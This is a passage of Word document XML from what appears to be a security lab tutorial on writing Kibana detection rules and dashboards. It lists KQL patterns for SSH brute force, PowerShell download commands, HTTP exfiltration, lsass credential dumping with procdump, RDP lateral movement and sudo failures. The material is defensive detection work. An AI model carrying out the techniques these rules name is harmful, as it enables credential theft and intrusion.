      <w:r w:rsidRPr="00463952">
        <w:t xml:space="preserve"> tab.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AF3E327" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="72"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00463952">
        <w:t xml:space="preserve">If it asks to “Activate detection engine,” click </w:t>
      </w:r>
      <w:r w:rsidRPr="00463952">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Set up</w:t>
      </w:r>
      <w:r w:rsidRPr="00463952">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="595E3478" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00463952">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2️</w:t>
      </w:r>
      <w:r w:rsidRPr="00463952">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>⃣</w:t>
      </w:r>
      <w:r w:rsidRPr="00463952">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Create a new rule</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E0FCF9D" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="73"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00463952">
        <w:t xml:space="preserve">Click </w:t>
      </w:r>
      <w:r w:rsidRPr="00463952">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Create new rule → Custom query</w:t>
      </w:r>
      <w:r w:rsidRPr="00463952">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F9C82B8" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
      <w:r w:rsidRPr="00463952">
        <w:t>Example:</w:t>
      </w:r>
      <w:r w:rsidRPr="00463952">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00463952">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Detect multiple failed SSH logins</w:t>
      </w:r>
      <w:r w:rsidRPr="00463952">
        <w:br/>
        <w:t>Query (KQL):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="024F87AB" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00463952">
        <w:t>event.module</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00463952">
        <w:t xml:space="preserve"> : "auth" and message : "Failed password"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40144ECA" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
      <w:r w:rsidRPr="00463952">
        <w:t xml:space="preserve">Then under </w:t>
      </w:r>
      <w:r w:rsidRPr="00463952">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Threshold</w:t>
      </w:r>
      <w:r w:rsidRPr="00463952">
        <w:t>, set:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="661F608B" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
      <w:r w:rsidRPr="00463952">
        <w:t>Count ≥ 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC79813" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
      <w:r w:rsidRPr="00463952">
        <w:t>Group by [</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00463952">
        <w:t>source.ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00463952">
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7021FA19" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
      <w:r w:rsidRPr="00463952">
        <w:t>Name: “Multiple SSH Failed Logins (T1110.001)”</w:t>
      </w:r>
      <w:r w:rsidRPr="00463952">
        <w:br/>
        <w:t>Severity: Medium</w:t>
      </w:r>
      <w:r w:rsidRPr="00463952">
        <w:br/>
        <w:t>MITRE ATT&amp;CK: T1110 — Brute Force</w:t>
      </w:r>
      <w:r w:rsidRPr="00463952">
        <w:br/>
        <w:t>Schedule: every 1 minute</w:t>
      </w:r>
      <w:r w:rsidRPr="00463952">
        <w:br/>
        <w:t>Action: Email or log alert (you can just show it in Kibana for demo).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6284922F" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00000000" w:rsidP="00463952">
      <w:r>
        <w:pict w14:anchorId="64743839">
          <v:rect id="_x0000_i1102" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="12E8EDB8" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00463952">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3️</w:t>
      </w:r>
      <w:r w:rsidRPr="00463952">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>⃣</w:t>
      </w:r>
      <w:r w:rsidRPr="00463952">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Another example: PowerShell suspicious usage (Windows)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CF45AC1" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
      <w:r w:rsidRPr="00463952">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Query (KQL):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="154A465A" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00463952">
        <w:t>event.provider</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00463952">
        <w:t xml:space="preserve"> : "Microsoft-Windows-PowerShell" and message : ("Invoke-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00463952">
        <w:t>WebRequest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00463952">
        <w:t>" or "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00463952">
        <w:t>DownloadFile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00463952">
        <w:t>" or "Base64String")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D79B2ED" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
      <w:r w:rsidRPr="00463952">
        <w:t xml:space="preserve">MITRE Technique: </w:t>
      </w:r>
      <w:r w:rsidRPr="00463952">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1059.001 — PowerShell</w:t>
      </w:r>
      <w:r w:rsidRPr="00463952">
        <w:br/>
        <w:t>Severity: High</w:t>
      </w:r>
      <w:r w:rsidRPr="00463952">
        <w:br/>
        <w:t>Description: Detects use of potentially malicious PowerShell commands.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D20BD6" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00000000" w:rsidP="00463952">
      <w:r>
        <w:pict w14:anchorId="599DC490">
          <v:rect id="_x0000_i1103" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="351CCD23" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00463952">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4️</w:t>
      </w:r>
      <w:r w:rsidRPr="00463952">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>⃣</w:t>
      </w:r>
      <w:r w:rsidRPr="00463952">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Example: Data Exfiltration via HTTP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF67AA1" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
      <w:r w:rsidRPr="00463952">
        <w:t>If using Suricata or Zeek network logs:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06CB2DD6" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00463952">
        <w:t>event.source</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00463952">
        <w:t xml:space="preserve"> : "network" and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00463952">
        <w:t>network.protocol</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00463952">
        <w:t xml:space="preserve"> : "http" and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00463952">
        <w:t>bytes_out</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00463952">
        <w:t xml:space="preserve"> &gt; 1000000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BAA18D3" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
      <w:r w:rsidRPr="00463952">
        <w:t>(More than 1 MB sent outbound → suspicious exfil.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07872555" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
      <w:r w:rsidRPr="00463952">
        <w:t>MITRE: T1041 — Exfiltration over C2 Channel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66AFD6B6" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00000000" w:rsidP="00463952">
      <w:r>
        <w:pict w14:anchorId="148AAAB2">
          <v:rect id="_x0000_i1104" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="02CD0419" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00463952">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5️</w:t>
      </w:r>
      <w:r w:rsidRPr="00463952">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>⃣</w:t>
      </w:r>
      <w:r w:rsidRPr="00463952">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Example: Credential Dumping (Windows)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E22EFDA" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
      <w:r w:rsidRPr="00463952">
        <w:t>Look for process names like “lsass.exe” + suspicious tool usage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D583D96" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
      <w:r w:rsidRPr="00463952">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">process.name : ("procdump.exe" or "lsass.exe") and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00463952">
        <w:t>event.action</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00463952">
        <w:t xml:space="preserve"> : "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00463952">
        <w:t>process_start</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00463952">
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D3F8798" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
      <w:r w:rsidRPr="00463952">
        <w:t>MITRE: T1003 — Credential Dumping</w:t>
      </w:r>
      <w:r w:rsidRPr="00463952">
        <w:br/>
        <w:t>Severity: Critical</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3941C5D5" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00000000" w:rsidP="00463952">
      <w:r>
        <w:pict w14:anchorId="26C33519">
          <v:rect id="_x0000_i1105" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B4F60B6" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00463952">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6️</w:t>
      </w:r>
      <w:r w:rsidRPr="00463952">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>⃣</w:t>
      </w:r>
      <w:r w:rsidRPr="00463952">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Example: Lateral Movement Detection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F3DE1EA" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00463952">
        <w:t>event.module</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00463952">
        <w:t xml:space="preserve"> : "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00463952">
        <w:t>winlogbeat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00463952">
        <w:t>" and (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00463952">
        <w:t>event.action</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00463952">
        <w:t xml:space="preserve"> : "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00463952">
        <w:t>network_connection</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00463952">
        <w:t xml:space="preserve">" and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00463952">
        <w:t>destination.port</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00463952">
        <w:t xml:space="preserve"> : 3389)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24107F8A" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
      <w:r w:rsidRPr="00463952">
        <w:t>→ Detects unexpected RDP usage.</w:t>
      </w:r>
      <w:r w:rsidRPr="00463952">
        <w:br/>
        <w:t>MITRE: T1021 — Remote Services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27F98715" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00000000" w:rsidP="00463952">
      <w:r>
        <w:pict w14:anchorId="29D8D008">
          <v:rect id="_x0000_i1106" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC00214" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00463952">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7️</w:t>
      </w:r>
      <w:r w:rsidRPr="00463952">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>⃣</w:t>
      </w:r>
      <w:r w:rsidRPr="00463952">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Example: Privilege Escalation (Linux)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="231C7DC1" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00463952">
        <w:t>event.module</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00463952">
        <w:t xml:space="preserve"> : "auth" and message : ("</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00463952">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00463952">
        <w:t>" and "authentication failure")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17110957" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
      <w:r w:rsidRPr="00463952">
        <w:t>MITRE: T1068 — Privilege Escalation</w:t>
      </w:r>
      <w:r w:rsidRPr="00463952">
        <w:br/>
        <w:t>Severity: Medium</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A0193D" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00000000" w:rsidP="00463952">
      <w:r>
        <w:pict w14:anchorId="7DB19579">
          <v:rect id="_x0000_i1107" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF4E957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📈</w:t>
      </w:r>
      <w:r w:rsidRPr="00463952">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Step 6.3 — Visualizing in Dashboards</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A88093" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
      <w:r w:rsidRPr="00463952">
        <w:t xml:space="preserve">Go to </w:t>
      </w:r>
      <w:r w:rsidRPr="00463952">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Kibana → Dashboard → Create new dashboard</w:t>
      </w:r>
      <w:r w:rsidRPr="00463952">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18597CAB" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
      <w:r w:rsidRPr="00463952">
        <w:t>Add these types of panels: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2489"/>
        <w:gridCol w:w="3125"/>
      </w:tblGrid>
      <w:tr w:rsidR="00463952" w:rsidRPr="00463952" w14:paraId="08208D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1069DD" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00463952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5CBA1089" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0046395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9193C05" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00463952">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Example Query</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00463952" w:rsidRPr="00463952" w14:paraId="4DABC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C2B29" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
            <w:r w:rsidRPr="00463952">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Pie Chart</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="10709FD6" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
            <w:r w:rsidRPr="00463952">
              <w:t>Top 5 attack types</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4BB08359" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
            <w:r w:rsidRPr="00463952">
              <w:t xml:space="preserve">terms of </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00463952">
              <w:t>mitre.technique.keyword</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00463952" w:rsidRPr="00463952" w14:paraId="7FEC33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7F5F3" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
            <w:r w:rsidRPr="00463952">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Bar Chart</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4AD34784" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
            <w:r w:rsidRPr="00463952">
              <w:t>Failed logins per IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="266B5D6F" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
            <w:r w:rsidRPr="00463952">
              <w:t xml:space="preserve">terms of </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00463952">
              <w:t>source.ip.keyword</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00463952" w:rsidRPr="00463952" w14:paraId="55CB2D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10BAD" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
            <w:r w:rsidRPr="00463952">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Line Chart</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0E79BA00" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
            <w:r w:rsidRPr="00463952">
              <w:t>Number of alerts over time</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6EE156C8" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
            <w:r w:rsidRPr="00463952">
              <w:t>count by @timestamp</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00463952" w:rsidRPr="00463952" w14:paraId="7D6D8E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EB87A" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
            <w:r w:rsidRPr="00463952">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Map View</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="744825B1" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
            <w:r w:rsidRPr="00463952">
              <w:t>Source of external IPs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0EDADD6E" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
            <w:r w:rsidRPr="00463952">
              <w:t xml:space="preserve">use </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00463952">
              <w:t>geoip.location</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00463952" w:rsidRPr="00463952" w14:paraId="5EB16B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50C14" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
            <w:r w:rsidRPr="00463952">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Data Table</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2FAD3C99" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
            <w:r w:rsidRPr="00463952">
              <w:t>Recent High-Severity Alerts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="23FA91A0" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
            <w:r w:rsidRPr="00463952">
              <w:t xml:space="preserve">filter </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
